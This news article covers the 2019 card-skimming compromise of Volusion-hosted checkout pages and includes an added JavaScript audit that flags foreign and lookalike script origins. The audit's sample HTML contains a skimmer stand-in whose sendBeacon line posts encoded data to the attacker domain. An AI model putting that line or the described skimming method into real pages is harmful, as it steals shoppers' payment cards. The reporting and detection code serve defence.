10 October 2019

Hackers hit Volusion e-commerce sites in pursuit of customers’ credit card data

Hackers compromised the infrastructure of the Volusion cloud-based e-commerce platform to infect customer checkout pages with malicious JavaScript code that pilfers payment card data. The info-stealing code was found embedded in a JavaScript file that is part of the Volusion e-commerce software. It is estimated that more than 6,500 sites are affected, but given Volusion's claim that it has more than 20,000 customers, that number could be even higher.

The compromise was discovered by Check Point security researcher Marcel Afrahim while shopping on the Sesame Street Live Store, which sells various merchandise from the popular kids' show. The site is built with Volusion’s All-in-One E-commerce Website Builder, and Volusion even provides its nameservers. On the checkout page the researcher noticed a strange JavaScript file named 'resources.js', loaded from a bucket called ‘volusionapi’ on storage.googleapis.com.

For those unaware, storage.googleapis.com is a Google Cloud Storage domain name; Google Cloud Storage is a RESTful online file storage web service for storing and accessing data on Google Cloud Platform infrastructure. Anyone can sign up, choose a unique bucket name and serve content with the performance and scalability of Google’s cloud. The odd part was that this file was the only resource loaded from a source other than 'sesamestreetlivestore.com' or 'volusion.com'-affiliated websites.

'Resources.js' poses as a seemingly innocuous JavaScript library called ‘JavaScript Cookie’, designed for handling cookies, but in reality the script reads the values typed into the credit card fields, Base64-encodes them and stores the result in the browser's temporary 'sessionStorage' under the name '__utmz_opt_in_out'. The data is then exfiltrated to 'volusion-cdn.com/analytics/beacon', an attacker-controlled domain chosen to look like part of Volusion's infrastructure.
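The two observations that led to the discovery (a single resource loaded from an origin that is neither the shop's nor the platform's, and a lookalike domain receiving the beacon) can be turned into a simple checkout-page audit. The script below is an added example written for this page; it is not Volusion's or Check Point's code. It extracts script sources and any absolute URLs mentioned in inline scripts from a page's HTML, flags origins outside an allowlist, and marks hostnames that embed the platform's brand name without belonging to it. The sample HTML is constructed for the demo; the hostnames and storage key in it are the ones named in the article, and the allowlist of legitimate origins is an assumption.

```javascript
// Added example: first-party resource audit for a checkout page.
// Not Volusion's or Check Point's code. Allowlist and sample HTML are assumptions.

// Origins a Volusion-hosted shop is assumed to load legitimately (demo assumption).
const ALLOWED_SUFFIXES = ['sesamestreetlivestore.com', 'volusion.com'];

// CONSTRUCTED sample checkout page mirroring the resources described in the report.
const SAMPLE_HTML = `
<html><head>
<script src="https://www.sesamestreetlivestore.com/a/j/jquery.js"></script>
<script src="https://www.volusion.com/v/vspfiles/vnav.js"></script>
<script src="https://storage.googleapis.com/volusionapi/resources.js"></script>
<script>
  sessionStorage.setItem('__utmz_opt_in_out', btoa(data));
  navigator.sendBeacon('https://volusion-cdn.com/analytics/beacon', payload);
</script>
</head><body></body></html>`;

// True when the hostname is an allowed domain or a subdomain of one.
function hostMatchesAllowed(hostname) {
  return ALLOWED_SUFFIXES.some(s => hostname === s || hostname.endsWith('.' + s));
}

// Collect external <script src> URLs plus absolute URLs found inside inline scripts.
function extractUrls(html) {
  const urls = new Set();
  const srcRe = /<script[^>]*\ssrc=["']([^"']+)["']/gi;
  let m;
  while ((m = srcRe.exec(html)) !== null) urls.add(m[1]);
  // Inline scripts: a <script> tag with no src attribute.
  const inlineRe = /<script(?![^>]*\ssrc=)[^>]*>([\s\S]*?)<\/script>/gi;
  while ((m = inlineRe.exec(html)) !== null) {
    const urlRe = /https?:\/\/[^\s"'<>)]+/g;
    let u;
    while ((u = urlRe.exec(m[1])) !== null) urls.add(u[0]);
  }
  return [...urls];
}

// Lookalike check: the hostname contains the brand name but is not under the brand's domain.
function looksLikeBrand(hostname, brand) {
  return hostname.includes(brand) && !hostMatchesAllowed(hostname);
}

// Returns one finding per URL whose origin is outside the allowlist.
function auditCheckoutPage(html) {
  const findings = [];
  for (const raw of extractUrls(html)) {
    let host;
    try { host = new URL(raw).hostname; } catch { continue; } // skip relative/invalid URLs
    if (hostMatchesAllowed(host)) continue;
    const reasons = ['third-party origin'];
    if (looksLikeBrand(host, 'volusion')) reasons.push('brand lookalike domain');
    findings.push({ url: raw, host, reasons });
  }
  return findings;
}

// Secondary check: the sessionStorage key the report names as an indicator.
function containsKnownStorageKey(html, key = '__utmz_opt_in_out') {
  return html.includes(key);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditCheckoutPage(SAMPLE_HTML)) {
    console.log(`${f.host}: ${f.reasons.join(', ')} (${f.url})`);
  }
  console.log('known storage key present:', containsKnownStorageKey(SAMPLE_HTML));
}
```

Run on the sample, the audit reports storage.googleapis.com as a third-party origin and volusion-cdn.com as both third-party and a brand lookalike, while the two first-party scripts (including the tampered 'vnav.js', which is served from the platform's own domain) pass. That last point is the caveat: an origin allowlist catches the secondary loader and the beacon, not a modified file on a trusted host, so it complements rather than replaces integrity monitoring of the platform's own scripts. The same allowlist expressed as a Content-Security-Policy with `script-src` and `connect-src` restricted to the shop's and platform's origins would have blocked both the bucket load and the beacon in the browser.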

“While it is not overly sophisticated, the actors behind this operation went through some lengthy steps to make the traffic look normal,” the researcher said.

As to how the script got into the page in the first place, Afrahim explained that it was loaded via 'vnav.js', a JavaScript file used for navigating the UI menu.

“The code itself is claiming to be jQuery UI — v1.10.3, used for navigation UI menu, but there is the addition of the script to load the secondary malicious script to post data via a third script,” the researcher said.

A quick search for domains containing the tainted Volusion JavaScript revealed 6593 web pages that are probably hosted by Volusion and might be affected.

The incident falls into the category of so-called Magecart attacks, or web card skimming, in which cybercriminals steal payment card details from websites and e-commerce platforms. These attacks have been happening for nearly a decade, but in the past two years they have intensified. According to a recent RiskIQ report, over the last few months card-stealing scripts were spotted on more than 18,000 websites.